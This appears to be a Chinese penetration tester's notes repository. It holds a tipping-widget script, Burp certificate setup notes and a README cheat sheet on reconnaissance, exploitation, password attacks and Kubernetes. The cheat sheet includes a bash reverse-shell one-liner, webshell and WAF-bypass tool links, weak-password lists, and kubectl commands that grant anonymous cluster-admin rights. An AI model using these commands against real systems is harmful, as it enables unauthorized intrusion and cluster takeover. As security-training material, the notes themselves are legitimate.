QRCode.createBytes(c,b)};QRCode.createBytes=function(a,b){for(var d=0,c=0,e=0,f=Array(b.length),h=Array(b.length),g=0;g>>=1;return b},getPatternPosition:function(a){return QRUtil.PATTERN_POSITION_TABLE[a-1]},getMask:function(a,b,d){switch(a){case QRMaskPattern.PATTERN000:return 0==(b+d)%2;case QRMaskPattern.PATTERN001:return 0==b%2;case QRMaskPattern.PATTERN010:return 0==d%3;case QRMaskPattern.PATTERN011:return 0==(b+d)%3;case QRMaskPattern.PATTERN100:return 0==(Math.floor(b/2)+Math.floor(d/3))%2;case QRMaskPattern.PATTERN101:return 0==b*d%2+b*d%3;case QRMaskPattern.PATTERN110:return 0==(b*d%2+b*d%3)%2;case QRMaskPattern.PATTERN111:return 0==(b*d%3+(b+d)%2)%2;default:throw Error("bad maskPattern:"+a);}},getErrorCorrectPolynomial:function(a){for(var b=new QRPolynomial([1],0),d=0;db)switch(a){case QRMode.MODE_NUMBER:return 10;case QRMode.MODE_ALPHA_NUM:return 9;case QRMode.MODE_8BIT_BYTE:return 8;case QRMode.MODE_KANJI:return 8;default:throw Error("mode:"+a);}else if(27>b)switch(a){case QRMode.MODE_NUMBER:return 12;case QRMode.MODE_ALPHA_NUM:return 11;case QRMode.MODE_8BIT_BYTE:return 16;case QRMode.MODE_KANJI:return 10;default:throw Error("mode:"+a);}else if(41>b)switch(a){case QRMode.MODE_NUMBER:return 14;case QRMode.MODE_ALPHA_NUM:return 13;case QRMode.MODE_8BIT_BYTE:return 16;case QRMode.MODE_KANJI:return 12;default:throw Error("mode:"+a);}else throw Error("type:"+b);},getLostPoint:function(a){for(var b=a.getModuleCount(),d=0,c=0;c=g;g++)if(!(0>c+g||b<=c+g))for(var k=-1;1>=k;k++)0>e+k||b<=e+k||0==g&&0==k||h!=a.isDark(c+g,e+k)||f++;5a)throw Error("glog("+a+")");return QRMath.LOG_TABLE[a]},gexp:function(a){for(;0>a;)a+=255;for(;256<=a;)a-=255;return QRMath.EXP_TABLE[a]},EXP_TABLE:Array(256),LOG_TABLE:Array(256)},i=0;8>i;i++)QRMath.EXP_TABLE[i]=1<i;i++)QRMath.EXP_TABLE[i]=QRMath.EXP_TABLE[i-4]^QRMath.EXP_TABLE[i-5]^QRMath.EXP_TABLE[i-6]^QRMath.EXP_TABLE[i-8];for(i=0;255>i;i++)QRMath.LOG_TABLE[QRMath.EXP_TABLE[i]]=i;function QRPolynomial(a,b){if(void 0==a.length)throw Error(a.length+"/"+b);for(var d=0;dthis.getLength()-a.getLength())return this;for(var b=QRMath.glog(this.get(0))-QRMath.glog(a.get(0)),d=Array(this.getLength()),c=0;c>>7-a%8&1)},put:function(a,b){for(var d=0;d>>b-d-1&1))},getLengthInBits:function(){return this.length},putBit:function(a){var b=Math.floor(this.length/8);this.buffer.length<=b&&this.buffer.push(0);a&&(this.buffer[b]|=128>>>this.length%8);this.length++}};var tctipUtil={createElement:function(a,b,d){b=document.createElement(b||"div");for(var c in a)"style"==c?b[c].cssText=a[c]:b[c]=a[c];return(d||document.body).appendChild(b)},getElementsByClassName:function(a,b){b=b||document;if(b.getElementsByClassName)return b.getElementsByClassName(a);var d=[],c=b.getElementsByTagName("*"),e=c.length,f=RegExp("(^|\\s)"+a+"(\\s|$)"),h,g;for(g=h=0;ha&&tctip.myConfig.list.hasOwnProperty(a);a++){var b=tctip.myConfig.list[a],d=tctipUtil.createElement({className:b.className},"li",this.myRewardsListUl),c=null;(function(){var e=b,f={href:"javascript:;",onmouseover:function(){tctip.leftMouseover(this,e)}};f[tctipUtil.getTextKey()]=b.name;4==a&&(f.className="fifth");c=tctipUtil.createElement(f,"a",d)})();"myR-on"==b.className&&(this.currentLi=d,this.currentData=b);tctipUtil.createElement({className:"png",src:tctip.imageUrl(b.icon),alt:b.name},"img",c)}},generateMyRewardsDetail:function(){tctip.myRewardsDetail&&tctip.myRewardsbox.removeChild(tctip.myRewardsDetail);this.myRewardsDetail=tctipUtil.createElement({className:"myRewards-detail"},"div",this.myRewardsbox);this.myRewardsUbox=tctipUtil.createElement({className:"myRewards-ubox"},"div",this.myRewardsDetail);var a={className:"myRewards-code-tit"};a[tctipUtil.getTextKey()]="\u626b\u63cf\u4e8c\u7ef4\u7801\u6253\u8d4f";tctipUtil.createElement(a,"p",this.myRewardsUbox);a=tctipUtil.createElement({className:"myRewards-code"},"div",this.myRewardsUbox);if(tctip.currentData.hasOwnProperty("qrimg")){tctipUtil.createElement({src:tctip.imageUrl(tctip.currentData.qrimg)},"img",a);a={className:"myRewards-account"};a[tctipUtil.getTextKey()]=tctip.currentData.desc||tctip.currentData.name;var b=tctipUtil.createElement(a,"p",this.myRewardsUbox)}else tctip.currentData.hasOwnProperty("account")&&(tctipUtil.generateQR({render:tctipUtil.isSupportCanvas()?"canvas":"table",text:tctip.currentData.account,width:106,height:106},a),a={className:"myRewards-account"},a[tctipUtil.getTextKey()]=tctip.currentData.desc||tctip.currentData.name,b=tctipUtil.createElement(a,"p",this.myRewardsUbox),a={},a[tctipUtil.getTextKey()]=tctip.currentData.account,tctipUtil.createElement({},"br",b),tctipUtil.createElement(a,"span",b))},leftMouseover:function(a,b){tctip.currentLi.className="";a.parentNode.className="myR-on";tctip.currentLi=a.parentNode;tctip.currentData=b;tctip.generateMyRewardsDetail()},loadCss:function(){tctipUtil.createElement({type:"text/css",rel:"stylesheet",href:tctip.cssUrl(tctip.myConfig.cssUrl)},"link")},stat:function(){tctipUtil.createElement({src:"http://stat.tctip.com/stat/index"},"script")},init:function(){document.body?(tctip.generateMyConfig(),tctip.loadCss(),tctip.generateMyRewards(),tctip.stat()):setTimeout(tctip.init,0)}};tctip.init(); -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/wechat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/06-移动端/安卓端安装BurpSuite证书/Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files/wechat.png -------------------------------------------------------------------------------- /06-移动端/安卓端安装BurpSuite证书/readme.md: -------------------------------------------------------------------------------- 1 | 参考文章:https://www.cnblogs.com/liuqiyun/p/12488845.html 2 | 3 | 同时文章备份了一份 -------------------------------------------------------------------------------- /06-移动端/小米手机配置BurpSuite证书/readme.md: -------------------------------------------------------------------------------- 1 | 手机浏览器访问下载无效 2 | 3 | 通过QQ传到手机 4 | 5 | 后缀der,小米手机不能识别,需改为crt 6 | 7 | 点击密码与安全->系统安全->加密与数据凭证->信任的凭据 8 | 9 | 10 | https://blog.csdn.net/helloexp/article/details/99720456 11 | https://xuexuguang.gitee.io/pages/6cceb5/#%E8%AF%81%E4%B9%A6%E5%AE%89%E8%A3%85 -------------------------------------------------------------------------------- /06-移动端/移动端抓不到包问题解决总结/readme.md: -------------------------------------------------------------------------------- 1 | 1、配置好代理后,手机端访问一个http的网站,能够访问,流量没走burp? 2 | 如果手机挂着VPN的话,流量会不走burp 3 | 4 | 2、配置好代理后,手机端访问一个http的网站,会卡住,同时burp抓不到数据包? 5 | 在家里会出现上述问题,在公司则没有上述问题 6 | -------------------------------------------------------------------------------- /07-云安全/知识星球分享-隐藏信息接管k8s集群.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/07-云安全/知识星球分享-隐藏信息接管k8s集群.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 01-案例学习 2 | ``` 3 | 【某师傅造的仿真环境,从GetShell到提权root】https://mp.weixin.qq.com/s/LK8zfWlz0s3v93sIY9DztQ 4 | ``` 5 | 6 | # 02-资产收集 7 | ``` 8 | 目标公司 -> 通过天眼查查询父子公司 -> 通过天眼查查询供应链公司 9 | 10 | 0x01 子域名收集(通过公司根域名收集子域名): 11 | 01 空间测绘 12 | 02 DNS解析 13 | 03 SSL证书 14 | 04 爆破子域名 15 | 16 | 0x02 IP段收集(需要判断目标是否使用CDN): 17 | 多地ping 18 | 空间测绘 19 | 20 | 0x03 Web目录扫描: 21 | https://github.com/ffuf/ffuf 22 | 23 | 0x04 从JavaScript中提取接口: 24 | https://github.com/GerbenJavado/LinkFinder 25 | https://github.com/rtcatc/Packer-Fuzzer 26 | 27 | 0x05 Host碰撞(原理见 -> Host碰撞原理.md): 28 | https://github.com/pmiaowu/HostCollision 29 | 30 | 0x06 403绕过(原理见 -> 403绕过原理.md): 31 | https://github.com/asaotomo/forbiddenpass-Hx0 32 | 33 | 0x07 历史解析记录: 34 | https://ip138.com/ 35 | 36 | 0x08 Punycode编码(从【某次攻防演练中通过一个弱口令干穿内网】https://mp.weixin.qq.com/s/lKa0SZezqh9diWe-0NqmiA这篇文章中看到Punycode编码收集资产,之前没听过这个东西,deepseek后有个基本了解,思考了一下感觉应该是:有些政府事业单位域名中使用中文,但中文的域名在录入域名系统时,需要使用Punycode编码,所以猜测作者是,使用中文对应的Punycode编码收集的子域名): 37 | https://myssl.com/punycode.html 38 | ``` 39 | 40 | # 03-漏洞检测 41 | ``` 42 | https://github.com/chaitin/xray 43 | https://github.com/projectdiscovery/nuclei 44 | https://github.com/m-sec-org/EZ 45 | https://github.com/zan8in/afrog 46 | 47 | https://docs.projectdiscovery.io/templates/protocols/http/raw-http-examples 48 | https://docs.projectdiscovery.io/templates/introduction 49 | 50 | 用nuclei进行批量漏洞检测时,如果怀疑是模板问题,可执行如下命令检查模板 51 | nuclei.exe -validate -t template.yaml 52 | 53 | 默认线程数25 54 | -c, -concurrency int maximum number of templates to be executed in parallel (default 25) 55 | ``` 56 | 57 | # 04-漏洞利用 58 | ``` 59 | https://github.com/swisskyrepo/PayloadsAllTheThings 60 | 61 | 0x01 拿到命令执行的口子 62 | 01、反弹shell 63 | 1.1 先判断目标是否出网 64 | 参见 -> xxx.md 65 | 1.2 再判断系统有哪些可用于反弹shell的程序 66 | whereis bash nc exec telnet python php perl ruby java go gcc g++ curl wget 67 | which bash nc exec telnet python php perl ruby java go gcc g++ curl wget 68 | 1.3 最后开始反弹shell 69 | /bin/bash -i >& /dev/tcp/1.1.1.1/1111 0>&1 70 | 02、反弹shell失败,可尝试进行url编码 71 | https://tool.chinaz.com/tools/urlencode.aspx 72 | 03、目标不出网时,通过echo写一句话木马 73 | echo "">1.php 74 | 1.php -> 75 | 76 | 在burp及bash下测试发现,执行如下命令 77 | echo "">1.php 78 | 1.php的内容如下,并不是正确的php一句话木马 79 | 80 | 81 | windows下echo "bbb">3.txt时,会将双引号带入文件内容,linux下echo "bbb">3.txt时,不会将双引号带入文件内容。 82 | 04、echo写入失败,可尝试base64编码 83 | 84 | 0x02 拿到SQL注入的口子 85 | 01、如果可以执行操作系统命令,想要写webshell,但碰到中文字符,可以通过16进制编码 86 | 参考: 87 | https://mp.weixin.qq.com/s/5wIqAeMW1IveoxU2sveMfA 88 | 89 | 0x03 webshell免杀 90 | https://github.com/AntSwordProject/antSword 91 | https://github.com/rebeyond/Behinder 92 | https://github.com/BeichenDream/Godzilla 93 | https://github.com/shack2/skyscorpion 94 | https://github.com/Chora10/Cknife 95 | https://github.com/Tas9er/ByPassBehinder4J 96 | https://github.com/cseroad/Webshell_Generate 97 | https://github.com/G0mini/Bypass 98 | http://bypass.tidesec.com/web/ 99 | https://github.com/czz1233/GBByPass 100 | https://github.com/AabyssZG/WebShell-Bypass-Guide/tree/main 101 | 102 | 0x04 webshell绕过disable_functions执行命令 103 | https://github.com/mm0r1/exploits/tree/master/php-filter-bypass 104 | 105 | 106 | 0x05 webshell下过360执行命令 107 | https://mp.weixin.qq.com/s/OGwo1zoN1LS3aYalZ_PePw 108 | 109 | 0x06 针对php标签的WAF绕过 110 | # 写法1 标准写法 111 | 112 | 113 | # 写法2 短标签,php5.4起 114 | 115 | 116 | # 写法3 asp风格 117 | <% echo 1; %> 118 | 119 | # 写法4 长标签写法 120 | 121 | 122 | 0x07 瑞数动态waf绕过 123 | https://github.com/wjlin0/riverPass 124 | https://github.com/R0A1NG/Botgate_bypass 125 | 126 | 0x08 owasp top 10漏洞WAF绕过 127 | https://github.com/leveryd/x-waf 128 | ``` 129 | 130 | # 05-口令攻击 131 | ``` 132 | # Attack 1 133 | 拿到一个系统,手动尝试的弱口令 134 | admin admin 135 | admin admin123 136 | admin admin888 137 | admin 123456 138 | test test 139 | test 123456 140 | 141 | # Attack 2 142 | 手动尝试无果后,开始爆破,爆破也是有技巧的,以(单位域名+单位名称首字母)为字典种子生成一批字典,随便选一个单位,以北京师范大学为例,种子为: 143 | bnu 144 | bjsf 145 | 146 | 生成的字典: 147 | (全小写/全大写/首字母大写)1 148 | (全小写/全大写/首字母大写)123 149 | (全小写/全大写/首字母大写)@123 150 | (全小写/全大写/首字母大写)@(全小写/全大写/首字母大写)1 151 | (全小写/全大写/首字母大写)@(全小写/全大写/首字母大写)123 152 | 153 | 爆破方式1:常见用户名/默认用户名 + 字典作为密码 154 | 爆破方式2:字典作为用户名 + 常见密码/默认密码 155 | 156 | # Attack 3 157 | 上面两种方式都无果的话,就掏出你的储备的字典去碰碰运气吧 158 | ``` 159 | 160 | # 06-移动端 161 | ``` 162 | 绕过APP强制更新 163 | 绕过Frida反调试 164 | 绕过APP代理检测 165 | root检测和绕过方案 166 | 167 | Android 7.0 Https抓包单双向验证解决方案汇总 168 | https://www.yuanrenxue.cn/app-crawl/android-7-capture-data.html 169 | 170 | 绕过SSL双向校验抓取Soul App的数据包 171 | https://blog.csdn.net/qq_38316655/article/details/104176882 172 | 173 | 一些APP渗透测试时的小tips 174 | https://mp.weixin.qq.com/s/IDv2ERO54TdDgvAcvx7FYQ 175 | 176 | 记某app使用autodecoder插件绕过加密数据包+重放防护 177 | https://mp.weixin.qq.com/s/v77kfoRcP9Jo7939402Ykg 178 | 179 | 小程序自动化渗透 180 | https://mp.weixin.qq.com/s/ebZjE_85RLIC5TZQ1JC1og 181 | ``` 182 | 183 | # 07-云安全 184 | ``` 185 | # 获取当前集群下全部node 186 | .\kubectl -s 172.31.32.36:8089 get nodes 187 | # 获取node详细信息 188 | .\kubectl -s 172.31.32.36:8089 describe node 10-8-0-135 189 | # 获取当前节点下全部pod 190 | .\kubectl -s 172.31.32.36:8089 get pods 191 | # 获取直接pod详细信息 192 | .\kubectl -s 172.31.32.36:8089 describe pod wpsai-apollo-adminservice-744b6bddcd-hdngw 193 | 194 | # 获取cluster ip 195 | .\kubectl.exe -s 172.31.32.36:8089 -n default get service 196 | .\kubectl.exe -s 172.31.32.36:8089 get pods -o wide 197 | --kubelet-client-certificate=ca.crt --kubelet-client-key=token.txt 198 | .\kubectl.exe -s 172.31.32.36:8089 --namespace=default exec -it wpsai-apollo-adminservice-744b6bddcd-hdngw bash 199 | .\kubectl.exe -s 172.31.32.36:8089 create clusterrolebinding kube-apiserver:kubelet-apis --clusterrole=system:kubelet-api-admin --user=system:anonymous 200 | .\kubectl -s 172.31.32.36:8089 create clusterrolebinding kube-apiserver:kubelet-apis --clusterrole=system:kubelet-api-admin --user kubernetes-master 201 | .\kubectl -s 172.31.32.36:8089 describe pod/wpsai-apollo-adminservice-744b6bddcd-hdngw -n default 202 | ``` --------------------------------------------------------------------------------